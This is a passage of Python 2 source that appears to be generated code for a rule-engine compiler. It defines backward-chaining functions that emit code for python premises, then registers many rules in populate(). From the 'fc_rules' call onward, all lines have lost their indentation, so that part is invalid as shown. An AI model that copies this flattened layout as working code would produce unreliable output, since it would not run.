          context.undo_to_mark(mark2)
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
        rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
# Handles a python premise in a backward-chaining rule by proving the
# 'python_premise' subgoal with the next clause number.
def bc_python_premise(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
                                      context.lookup_data('clause_num') + 1):
          context.end_save_all_undo()
          with engine.prove(rule.rule_base.root_name, 'python_premise', context,
                            (rule.pattern(1),
                             rule.pattern(2),
                             rule.pattern(3),
                             rule.pattern(4),
                             rule.pattern(5),
                             rule.pattern(6),
                             rule.pattern(7),)) \
              as gen_2:
            for x_2 in gen_2:
              assert x_2 is None, \
                "compiler.bc_python_premise: got unexpected plan from when clause 2"
              rule.rule_base.num_bc_rule_successes += 1
              yield
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
        rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
# Generates the match_data code for a '$var = <python expression>' premise:
# the emitted lines match the expression's value against the premise pattern.
def python_eq(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              helpers.merge_pattern(context.lookup_data('pattern'),
                                    context.lookup_data('patterns_in'))):
          context.end_save_all_undo()
          mark2 = context.mark(True)
          if rule.pattern(1).match_data(context, context,
                context.lookup_data('python_code')[:-1] + (context.lookup_data('python_code')[-1] + '):',)):
            context.end_save_all_undo()
            mark3 = context.mark(True)
            if rule.pattern(2).match_data(context, context,
                  ("mark%d = context.mark(True)" % context.lookup_data('clause_num'),
                   "if rule.pattern(%d).match_data(context, context," %
                     context.lookup_data('pat_num'),
                   ('INDENT', 2),
                   ('INDENT', 5),
                   ('STARTING_LINENO', context.lookup_data('start_lineno')),
                   context.lookup_data('python_code2'),
                   ('ENDING_LINENO', context.lookup_data('end_lineno')),
                   "POPINDENT",
                   "context.end_save_all_undo()",
                  )):
              context.end_save_all_undo()
              mark4 = context.mark(True)
              if rule.pattern(3).match_data(context, context,
                    ('POPINDENT',
                     "else: context.end_save_all_undo()",
                     "context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),)):
                context.end_save_all_undo()
                rule.rule_base.num_bc_rule_successes += 1
                yield
              else: context.end_save_all_undo()
              context.undo_to_mark(mark4)
            else: context.end_save_all_undo()
            context.undo_to_mark(mark3)
          else: context.end_save_all_undo()
          context.undo_to_mark(mark2)
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
        rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
# Generates the 'for python_ans in <python expression>' loop that matches the
# premise pattern against each value of the iterable, with an optional break
# condition.
def python_in(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              helpers.merge_pattern(context.lookup_data('pattern'),
                                    context.lookup_data('patterns_in'))):
          context.end_save_all_undo()
          mark2 = context.mark(True)
          if rule.pattern(1).match_data(context, context,
                context.lookup_data('python_code')[:-1] + (context.lookup_data('python_code')[-1] + ':',)):
            context.end_save_all_undo()
            mark3 = context.mark(True)
            if rule.pattern(2).match_data(context, context,
                  ("for python_ans in \\",
                   ('INDENT', 2),
                   ('INDENT', 2),
                   ('STARTING_LINENO', context.lookup_data('start_lineno')),
                   context.lookup_data('python_code2'),
                   ('ENDING_LINENO', context.lookup_data('end_lineno')),
                   'POPINDENT',
                   "mark%d = context.mark(True)" % context.lookup_data('clause_num'),
                   "if rule.pattern(%d).match_data(context, context, "
                     "python_ans):" % context.lookup_data('pat_num'),
                   ('INDENT', 2),
                   "context.end_save_all_undo()",
                  )):
              context.end_save_all_undo()
              mark4 = context.mark(True)
              if rule.pattern(3).match_data(context, context,
                    (() if context.lookup_data('break_cond') is None
                        else ("if %s:" % context.lookup_data('break_cond'),
                              ('INDENT', 2),
                              "context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),
                              "break",
                              'POPINDENT',),
                     'POPINDENT',
                     "else: context.end_save_all_undo()",
                     "context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),
                     'POPINDENT',)):
                context.end_save_all_undo()
                rule.rule_base.num_bc_rule_successes += 1
                yield
              else: context.end_save_all_undo()
              context.undo_to_mark(mark4)
            else: context.end_save_all_undo()
            context.undo_to_mark(mark3)
          else: context.end_save_all_undo()
          context.undo_to_mark(mark2)
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
        rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
# Generates the 'if <python expression>:' guard emitted for a check premise.
def python_check(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              context.lookup_data('python_code')[:-1] + (context.lookup_data('python_code')[-1] + ':',)):
          context.end_save_all_undo()
          mark2 = context.mark(True)
          if rule.pattern(1).match_data(context, context,
                (('STARTING_LINENO', context.lookup_data('start_lineno')),
                 "if " + context.lookup_data('python_code2')[0].strip(),
                 ('INDENT', 3),
                 context.lookup_data('python_code2')[1:],
                 'POPINDENT',
                 ('ENDING_LINENO', context.lookup_data('end_lineno')),
                 ('INDENT', 2),
                )):
            context.end_save_all_undo()
            rule.rule_base.num_bc_rule_successes += 1
            yield
          else: context.end_save_all_undo()
          context.undo_to_mark(mark2)
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
        rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
# python statements premise: succeeds whenever the goal arguments match;
# no extra code lines are generated here.
def python_block(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        rule.rule_base.num_bc_rule_successes += 1
        yield
        rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
# Registers the compiled backward-chaining rules with the 'compiler' rule base.
def populate(engine):
  This_rule_base = engine.get_create('compiler')
  bc_rule.bc_rule('file', This_rule_base, 'compile',
                  file, None,
                  (contexts.variable('generated_root_pkg'),
                   contexts.variable('rb_name'),
                   pattern.pattern_tuple((pattern.pattern_literal('file'), contexts.variable('parent'), pattern.pattern_tuple((contexts.variable('fc_rules'), contexts.variable('fc_extra_lines'),), None), pattern.pattern_tuple((contexts.variable('bc_rules'), contexts.variable('bc_extra_lines'), contexts.variable('plan_extra_lines'),), None),), None),
                   contexts.variable('fc_lines'),
                   contexts.variable('bc_lines'),
                   contexts.variable('plan_lines'),),
                  (),
                  (contexts.variable('fc_head'),
                   contexts.variable('bc_head'),
                   contexts.variable('plan_head'),
                   contexts.variable('rb_name'),
                   contexts.variable('parent'),
                   contexts.variable('decl_line'),
                   contexts.variable('fc_rules'),
                   contexts.variable('fc_fun_lines'),
                   contexts.variable('fc_init_lines'),
                   contexts.variable('bc_rules'),
                   contexts.variable('bc_plan_lines'),
                   contexts.variable('bc_bc_fun_lines'),
                   contexts.variable('bc_bc_init_lines'),
                   contexts.variable('fc_lines'),
                   contexts.variable('plan_lines'),
                   contexts.variable('bc_lines'),))
  bc_rule.bc_rule('rule_decl', This_rule_base, 'rule_decl',
                  rule_decl, None,
                  (contexts.variable('rb_name'),
                   pattern.pattern_literal(None),
                   contexts.variable('decl_line'),),
                  (),
                  (contexts.variable('decl_line'),))
  bc_rule.bc_rule('rule_decl_with_parent', This_rule_base, 'rule_decl',
                  rule_decl_with_parent, None,
                  (contexts.variable('rb_name'),
                   pattern.pattern_tuple((pattern.pattern_literal('parent'), contexts.variable('parent'), contexts.variable('excluded_symbols'),), None),
                   contexts.variable('decl_line'),),
                  (),
                  (contexts.variable('decl_line'),))
bc_rule.bc_rule('fc_rules', This_rule_base, 'fc_rules',
fc_rules, None,
(contexts.variable('fc_rules'),
contexts.variable('fc_funs'),
contexts.variable('fc_init'),),
(),
(contexts.variable('fc_rule'),
contexts.variable('fc_fun_1'),
contexts.variable('fc_init_1'),
contexts.variable('fc_funs'),
contexts.variable('fc_init'),))
bc_rule.bc_rule('fc_rule_', This_rule_base, 'fc_rule',
fc_rule_, None,
(pattern.pattern_tuple((pattern.pattern_literal('fc_rule'), contexts.variable('rule_name'), contexts.variable('fc_premises'), contexts.variable('assertions'),), None),
contexts.variable('fc_fun'),
contexts.variable('fc_init'),),
(),
(contexts.variable('rule_name'),
pattern.pattern_literal(0),
contexts.anonymous('_'),
contexts.variable('fc_premises'),
pattern.pattern_literal(None),
pattern.pattern_literal(False),
contexts.variable('prem_fn_head'),
contexts.variable('prem_fn_tail'),
contexts.variable('prem_decl_lines'),
pattern.pattern_literal(()),
contexts.variable('patterns_out1'),
contexts.variable('assertions'),
contexts.variable('asserts_fn_lines'),
contexts.variable('patterns_out'),
contexts.variable('fc_fun'),
contexts.variable('fc_init'),))
bc_rule.bc_rule('fc_premises0', This_rule_base, 'fc_premises',
fc_premises0, None,
(contexts.anonymous('_'),
contexts.variable('clause_num'),
contexts.variable('clause_num'),
pattern.pattern_literal(()),
contexts.anonymous('_'),
contexts.anonymous('_'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_in'),
pattern.pattern_literal(()),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
())
bc_rule.bc_rule('fc_premises1', This_rule_base, 'fc_premises',
fc_premises1, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((contexts.variable('first_prem'),), contexts.variable('rest_prems')),
contexts.variable('break_cond'),
contexts.variable('multi_match'),
pattern.pattern_tuple((contexts.variable('fn_head1'),), contexts.variable('fn_head2')),
pattern.pattern_tuple((contexts.variable('fn_tail2'),), contexts.variable('fn_tail1')),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('first_prem'),
contexts.variable('break_cond'),
contexts.variable('multi_match'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out1'),
contexts.variable('decl_lines1'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('next_clause_num'),
contexts.variable('rest_prems'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines2'),
contexts.variable('patterns_out'),
contexts.variable('decl_lines'),))
bc_rule.bc_rule('fc_premise', This_rule_base, 'fc_premise',
fc_premise, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_premise'), contexts.variable('kb_name'), contexts.variable('entity_name'), contexts.variable('arg_patterns'), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('break_cond'),
contexts.variable('multi_match'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
(contexts.variable('kb_name'),
contexts.variable('entity_name'),
contexts.variable('start_lineno'),
contexts.variable('end_lineno'),
contexts.variable('multi_match'),
contexts.variable('decl_num_in'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('next_clause_num'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),))
bc_rule.bc_rule('gen_fc_for_false', This_rule_base, 'gen_fc_for',
gen_fc_for_false, None,
(contexts.variable('kb_name'),
contexts.variable('entity_name'),
contexts.variable('start_lineno'),
contexts.variable('end_lineno'),
pattern.pattern_literal(False),
contexts.variable('decl_num'),
contexts.variable('fn_head'),),
(),
(contexts.variable('fn_head'),))
bc_rule.bc_rule('gen_fc_for_true', This_rule_base, 'gen_fc_for',
gen_fc_for_true, None,
(contexts.variable('kb_name'),
contexts.variable('entity_name'),
contexts.variable('start_lineno'),
contexts.variable('end_lineno'),
pattern.pattern_literal(True),
contexts.variable('decl_num'),
contexts.variable('fn_head'),),
(),
(contexts.variable('fn_head'),))
bc_rule.bc_rule('fc_first', This_rule_base, 'fc_premise',
fc_first, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_first'), contexts.variable('premises1'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
pattern.pattern_tuple((contexts.variable('init_worked'), contexts.variable('fn_head'), contexts.variable('set_worked'),), None),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('break_cond'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('premises1'),
pattern.pattern_literal(True),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('init_worked'),
contexts.variable('set_worked'),))
bc_rule.bc_rule('fc_forall_None', This_rule_base, 'fc_premise',
fc_forall_None, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_forall'), contexts.variable('premises1'), pattern.pattern_literal(None), contexts.anonymous('_'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
pattern.pattern_literal(()),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('premises1'),
pattern.pattern_literal(None),
pattern.pattern_literal(True),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('fc_forall_require', This_rule_base, 'fc_premise',
fc_forall_require, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_forall'), contexts.variable('premises1'), contexts.variable('require'), contexts.variable('start_lineno'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('premises1'),
pattern.pattern_literal(True),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out1'),
contexts.variable('decl_lines1'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('next_clause_num'),
contexts.variable('require'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines2'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('decl_lines'),))
bc_rule.bc_rule('fc_notany', This_rule_base, 'fc_premise',
fc_notany, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_notany'), contexts.variable('premises'), contexts.variable('start_lineno'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('premises'),
pattern.pattern_literal(True),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('fc_python_premise', This_rule_base, 'fc_premise',
fc_python_premise, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_in'),
pattern.pattern_literal(()),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('next_clause_num'),
contexts.variable('clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('assertions_0', This_rule_base, 'assertions',
assertions_0, None,
(pattern.pattern_literal(()),
pattern.pattern_literal(()),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
())
bc_rule.bc_rule('assertions_n', This_rule_base, 'assertions',
assertions_n, None,
(pattern.pattern_tuple((contexts.variable('first_assertion'),), contexts.variable('rest_assertions')),
pattern.pattern_tuple((contexts.variable('fn_lines1'),), contexts.variable('fn_lines2')),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('first_assertion'),
contexts.variable('fn_lines1'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('rest_assertions'),
contexts.variable('fn_lines2'),
contexts.variable('patterns_out'),))
bc_rule.bc_rule('assertion', This_rule_base, 'assertion',
assertion, None,
(pattern.pattern_tuple((pattern.pattern_literal('assert'), contexts.variable('kb_name'), contexts.variable('entity_name'), contexts.variable('patterns'), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('fn_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_nums'), contexts.variable('patterns_out'),), None),
contexts.variable('fn_lines'),))
bc_rule.bc_rule('python_assertion', This_rule_base, 'assertion',
python_assertion, None,
(pattern.pattern_tuple((pattern.pattern_literal('python_assertion'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
pattern.pattern_tuple((pattern.pattern_tuple((pattern.pattern_literal('STARTING_LINENO'), contexts.variable('start_lineno'),), None), contexts.variable('python_code'), pattern.pattern_tuple((pattern.pattern_literal('ENDING_LINENO'), contexts.variable('end_lineno'),), None),), None),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
())
bc_rule.bc_rule('bc_rules', This_rule_base, 'bc_rules',
bc_rules, None,
(contexts.variable('rb_name'),
contexts.variable('bc_rules'),
contexts.variable('bc_plan_lines'),
contexts.variable('bc_bc_funs'),
contexts.variable('bc_bc_init'),),
(),
(contexts.variable('bc_rule'),
contexts.variable('rb_name'),
contexts.variable('bc_plan1'),
contexts.variable('bc_bc_fun1'),
contexts.variable('bc_bc_init1'),
contexts.variable('bc_plan_lines'),
contexts.variable('bc_bc_funs'),
contexts.variable('bc_bc_init'),))
bc_rule.bc_rule('bc_rule_', This_rule_base, 'bc_rule',
bc_rule_, None,
(contexts.variable('rb_name'),
pattern.pattern_tuple((pattern.pattern_literal('bc_rule'), contexts.variable('name'), contexts.variable('goal'), contexts.variable('bc_premises'), contexts.variable('python_lines'), contexts.variable('plan_vars_needed'),), None),
contexts.variable('plan_lines'),
contexts.variable('bc_fun_lines'),
contexts.variable('bc_init_lines'),),
(),
(contexts.variable('rb_name'),
contexts.variable('name'),
contexts.variable('bc_premises'),
contexts.variable('plan_vars_needed'),
contexts.variable('prem_plan_lines'),
contexts.variable('prem_fn_head'),
contexts.variable('prem_fn_tail'),
contexts.variable('prem_decl_lines'),
pattern.pattern_tuple((contexts.variable('plan_lines'), contexts.variable('goal_fn_head'), contexts.variable('goal_fn_tail'), contexts.variable('goal_decl_lines'),), None),
contexts.variable('bc_fun_lines'),
contexts.variable('bc_init_lines'),))
bc_rule.bc_rule('bc_premises', This_rule_base, 'bc_premises',
bc_premises, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('bc_premises'),
contexts.variable('plan_vars_needed'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_lines'),),
(),
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
pattern.pattern_literal(1),
contexts.anonymous('_'),
contexts.variable('bc_premises'),
pattern.pattern_literal(None),
pattern.pattern_literal(True),
pattern.pattern_literal(()),
contexts.variable('patterns'),
contexts.variable('plan_vars_needed'),
contexts.variable('plan_var_names'),
contexts.variable('plan_lines1'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('pat_lines'),
contexts.variable('decl_lines'),
contexts.variable('plan_lines'),))
bc_rule.bc_rule('bc_premises1_0', This_rule_base, 'bc_premises1',
bc_premises1_0, None,
(contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('clause_num'),
contexts.variable('clause_num'),
pattern.pattern_literal(()),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns'),
contexts.variable('patterns'),
contexts.variable('plan_var_names'),
contexts.variable('plan_var_names'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),
pattern.pattern_literal(()),),
(),
())
bc_rule.bc_rule('bc_premises1_n', This_rule_base, 'bc_premises1',
bc_premises1_n, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((contexts.variable('first_prem'),), contexts.variable('rest_prems')),
contexts.variable('break_cond'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('first_prem'),
contexts.variable('break_cond'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out1'),
contexts.variable('plan_lines1'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('next_clause_num'),
contexts.variable('rest_prems'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines2'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('bc_premise', This_rule_base, 'bc_premise',
bc_premise, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_premise'), contexts.variable('required'), contexts.variable('kb_name'), contexts.variable('entity_name'), contexts.variable('arg_patterns'), contexts.variable('plan_spec'), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('break_cond'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('next_clause_num'),
contexts.variable('kb_name2'),
pattern.pattern_tuple((contexts.variable('pat_nums'), contexts.variable('patterns_out1'),), None),
contexts.variable('fn_head1'),
contexts.variable('required'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_literal(('POPINDENT', 'POPINDENT',)),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('plan_spec'),
contexts.variable('allow_plan'),
contexts.variable('patterns_out1'),
contexts.variable('patterns_out'),
contexts.variable('fn_head3'),
contexts.variable('fn_tail3'),
contexts.variable('plan_lines'),
contexts.variable('plan_vars_needed'),
pattern.pattern_tuple((contexts.anonymous('_'), contexts.variable('plan_var_names_out'),), None),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('bc_first', This_rule_base, 'bc_premise',
bc_first, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_first'), contexts.variable('required'), contexts.variable('bc_premises'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
pattern.pattern_tuple((contexts.variable('init_worked'), contexts.variable('fn_head'), contexts.variable('set_worked'),), None),
contexts.variable('fn_tail'),),
(),
(contexts.variable('break_cond'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('bc_premises'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('required'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('init_worked'),
contexts.variable('set_worked'),))
bc_rule.bc_rule('bc_forall_None', This_rule_base, 'bc_premise',
bc_forall_None, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_forall'), contexts.variable('bc_premises'), pattern.pattern_literal(None), contexts.anonymous('_'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
pattern.pattern_literal(()),),
(),
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('bc_premises'),
pattern.pattern_literal(None),
pattern.pattern_literal(False),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('bc_forall_require', This_rule_base, 'bc_premise',
bc_forall_require, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_forall'), contexts.variable('premises1'), contexts.variable('require'), contexts.variable('start_lineno'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
pattern.pattern_literal(()),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('premises1'),
pattern.pattern_literal(False),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out1'),
pattern.pattern_literal(()),
contexts.variable('fn_head1'),
